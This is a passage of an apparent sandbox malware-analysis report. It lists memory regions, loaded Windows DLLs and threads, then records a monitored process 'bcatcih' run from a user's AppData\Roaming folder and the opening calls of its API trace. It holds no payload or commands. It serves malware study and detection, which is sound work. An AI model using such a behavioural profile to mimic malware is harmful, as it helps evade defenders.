end_va = 0x7ffb24458fff monitored = 0 entry_point = 0x7ffb2441a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 10407 start_va = 0x7ffb24530000 end_va = 0x7ffb2453bfff monitored = 0 entry_point = 0x7ffb245327e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10408 start_va = 0x7ffb24610000 end_va = 0x7ffb24640fff monitored = 0 entry_point = 0x7ffb24617d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 10409 start_va = 0x7ffb24670000 end_va = 0x7ffb246e9fff monitored = 0 entry_point = 0x7ffb24691a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 10410 start_va = 0x7ffb24730000 end_va = 0x7ffb24763fff monitored = 0 entry_point = 0x7ffb2474ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 10411 start_va = 0x7ffb24770000 end_va = 0x7ffb24779fff monitored = 0 entry_point = 0x7ffb24771830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 10412 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 10413 start_va = 0x7ffb249f0000 end_va = 0x7ffb24a4bfff monitored = 0 entry_point = 0x7ffb24a06f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 10414 start_va = 0x7ffb24aa0000 end_va = 0x7ffb24ab6fff monitored = 0 entry_point = 0x7ffb24aa79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 10415 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 10416 start_va = 0x7ffb24c00000 end_va = 0x7ffb24c20fff monitored = 0 entry_point = 0x7ffb24c10250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 10417 start_va = 0x7ffb24c50000 end_va = 0x7ffb24c89fff monitored = 0 entry_point = 0x7ffb24c58d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 10418 start_va = 0x7ffb24c90000 end_va = 0x7ffb24cb6fff monitored = 0 entry_point = 0x7ffb24ca0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 10419 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 10420 start_va = 0x7ffb24f30000 end_va = 0x7ffb24f85fff monitored = 0 entry_point = 0x7ffb24f40bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 10421 start_va = 0x7ffb24f90000 end_va = 0x7ffb24fa8fff monitored = 0 entry_point = 0x7ffb24f95e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 10422 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 10423 start_va = 0x7ffb24fe0000 end_va = 0x7ffb25078fff monitored = 0 entry_point = 0x7ffb2500f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 10424 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 10425 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 10426 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 10427 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 10428 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10429 start_va = 0x7ffb253a0000 end_va = 0x7ffb253b6fff monitored = 0 entry_point = 0x7ffb253a1390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10430 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 10431 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 10432 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 10433 start_va = 0x7ffb25770000 end_va = 0x7ffb257f5fff monitored = 0 entry_point = 0x7ffb2577d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 10434 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 10435 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 10436 start_va = 0x7ffb25ea0000 end_va = 0x7ffb25ef4fff monitored = 0 entry_point = 0x7ffb25eb7970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 10437 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10438 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10439 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10440 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 10441 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10442 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10443 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 10444 start_va = 0x7ffb26780000 end_va = 0x7ffb267dbfff monitored = 0 entry_point = 0x7ffb2679b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 10445 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 10446 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10447 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 10448 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 10449 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10450 start_va = 0x7ffb284c0000 end_va = 0x7ffb288e8fff monitored = 0 entry_point = 0x7ffb284e8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 10451 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 10452 start_va = 0x7ffb28a40000 end_va = 0x7ffb28a47fff monitored = 0 entry_point = 0x7ffb28a41ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10453 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10454 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14360 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15399 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 15408 start_va = 0x5d80000 end_va = 0x5e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d80000" filename = "" Region: id = 15409 start_va = 0x6280000 end_va = 0x637ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 15410 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 20462 start_va = 0x8000000 end_va = 0x80fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008000000" filename = "" Region: id = 21167 start_va = 0x530000 end_va = 0x534fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 23100 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 23453 start_va = 0x8100000 end_va = 0x81fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008100000" filename = "" Thread: id = 63 os_tid = 0x1004 Thread: id = 64 os_tid = 0x7d0 Thread: id = 65 os_tid = 0x734 Thread: id = 66 os_tid = 0x778 Thread: id = 67 os_tid = 0xba8 Thread: id = 68 os_tid = 0x5bc Thread: id = 69 os_tid = 0x698 Thread: id = 70 os_tid = 0xa88 Thread: id = 71 os_tid = 0x81c Thread: id = 72 os_tid = 0xcb0 Thread: id = 73 os_tid = 0x88c Thread: id = 74 os_tid = 0xb74 Thread: id = 75 os_tid = 0xb84 Thread: id = 76 os_tid = 0xc0c Thread: id = 77 os_tid = 0xfbc Thread: id = 78 os_tid = 0xfa4 Thread: id = 79 os_tid = 0xf9c Thread: id = 80 os_tid = 0xf90 Thread: id = 81 os_tid = 0xf7c Thread: id = 82 os_tid = 0xf78 Thread: id = 83 os_tid = 0xf70 Thread: id = 84 os_tid = 0xf68 Thread: id = 85 os_tid = 0xf54 Thread: id = 86 os_tid = 0xf38 Thread: id = 87 os_tid = 0xf2c Thread: id = 88 os_tid = 0xf24 Thread: id = 89 os_tid = 0xf20 Thread: id = 90 os_tid = 0xf18 Thread: id = 91 os_tid = 0xf14 Thread: id = 92 os_tid = 0xef0 Thread: id = 93 os_tid = 0xee0 Thread: id = 94 os_tid = 0xed4 Thread: id = 95 os_tid = 0xec8 Thread: id = 96 os_tid = 0xe74 Thread: id = 97 os_tid = 0xe14 Thread: id = 98 os_tid = 0xd74 Thread: id = 99 os_tid = 0xb04 Thread: id = 100 os_tid = 0xb48 Thread: id = 101 os_tid = 0xb44 Thread: id = 102 os_tid = 0xb40 Thread: id = 103 os_tid = 0xaec Thread: id = 104 os_tid = 0xae4 Thread: id = 105 os_tid = 0xae0 Thread: id = 106 os_tid = 0xaa8 Thread: id = 107 os_tid = 0xa54 Thread: id = 108 os_tid = 0xa40 Thread: id = 109 os_tid = 0xa28 Thread: id = 110 os_tid = 0xa0c Thread: id = 111 os_tid = 0xa08 Thread: id = 112 os_tid = 0x9ec Thread: id = 113 os_tid = 0x9e4 Thread: id = 114 os_tid = 0x9e0 Thread: id = 115 os_tid = 0x9d8 Thread: id = 116 os_tid = 0x9d4 Thread: id = 117 os_tid = 0x950 Thread: id = 118 os_tid = 0x93c Thread: id = 119 os_tid = 0x91c Thread: id = 120 os_tid = 0x830 Thread: id = 121 os_tid = 0x4e0 Thread: id = 122 os_tid = 0x520 Thread: id = 123 os_tid = 0x48c Thread: id = 124 os_tid = 0x630 Thread: id = 125 os_tid = 0x4dc Thread: id = 126 os_tid = 0x4a8 Thread: id = 127 os_tid = 0x49c Thread: id = 128 os_tid = 0x44c Thread: id = 129 os_tid = 0x434 Thread: id = 130 os_tid = 0x408 Thread: id = 131 os_tid = 0x404 Thread: id = 132 os_tid = 0x2b0 Thread: id = 133 os_tid = 0x294 Thread: id = 134 os_tid = 0x168 Thread: id = 135 os_tid = 0x170 Thread: id = 136 os_tid = 0x288 Thread: id = 137 os_tid = 0x284 Thread: id = 138 os_tid = 0x264 Thread: id = 139 os_tid = 0x274 Thread: id = 140 os_tid = 0x15c Thread: id = 141 os_tid = 0xf4 Thread: id = 143 os_tid = 0xc18 Thread: id = 144 os_tid = 0x908 Thread: id = 145 os_tid = 0xbd8 Thread: id = 146 os_tid = 0x758 Thread: id = 148 os_tid = 0xa04 Thread: id = 150 os_tid = 0x2fc Process: id = "5" image_name = "bcatcih" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih" page_root = "0x366ae000" os_pid = "0x25c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x60" cmd_line = "C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13113 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13114 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 13115 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13116 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 13117 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 13118 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 13119 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 13120 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 13121 start_va = 0x400000 end_va = 0x2ef3fff monitored = 1 entry_point = 0x402738 region_type = mapped_file name = "bcatcih" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih") Region: id = 13122 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 13123 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13124 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13125 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 13126 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13127 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 14276 start_va = 0x3030000 end_va = 0x303ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 14277 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 14278 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 14279 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 14280 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 15325 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 15326 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 15327 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 15328 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15329 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 15330 start_va = 0x3040000 end_va = 0x30fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15331 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 16460 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 16461 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 16462 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 16463 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 16464 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 16465 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 16466 start_va = 0x3000000 end_va = 0x3029fff monitored = 0 entry_point = 0x3005680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 16467 start_va = 0x3200000 end_va = 0x3387fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 17286 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 18177 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18178 start_va = 0x3000000 end_va = 0x3000fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 18179 start_va = 0x3390000 end_va = 0x3510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003390000" filename = "" Region: id = 18180 start_va = 0x3520000 end_va = 0x491ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003520000" filename = "" Region: id = 18181 start_va = 0x3010000 end_va = 0x301ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 19084 start_va = 0x3020000 end_va = 0x3027fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003020000" filename = "" Thread: id = 142 os_tid = 0xd7c [0237.997] GetStartupInfoW (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0237.997] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0237.997] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x3010000 [0237.998] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0237.999] GetProcAddress (hModule=0x74650000, lpProcName="FlsAlloc") returned 0x7466a980 [0237.999] GetProcAddress (hModule=0x74650000, lpProcName="FlsGetValue") returned 0x74667570 [0237.999] GetProcAddress (hModule=0x74650000, lpProcName="FlsSetValue") returned 0x74669e30 [0237.999] GetProcAddress (hModule=0x74650000, lpProcName="FlsFree") returned 0x74674ff0 [0238.001] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x214) returned 0x30105a8 [0238.001] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0238.001] GetCurrentThreadId () returned 0xd7c [0238.001] GetStartupInfoW (in: lpStartupInfo=0x19feb4 | out: lpStartupInfo=0x19feb4*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x403be6, hStdOutput=0x403f1f, hStdError=0x30105a8)) [0238.001] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x800) returned 0x30107c8 [0238.002] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0238.002] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0238.002] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0238.002] SetHandleCount (uNumber=0x20) returned 0x20 [0238.002] GetCommandLineA () returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" [0238.002] GetEnvironmentStringsW () returned 0x2f10cd8* [0238.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1291, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1291 [0238.002] RtlAllocateHeap 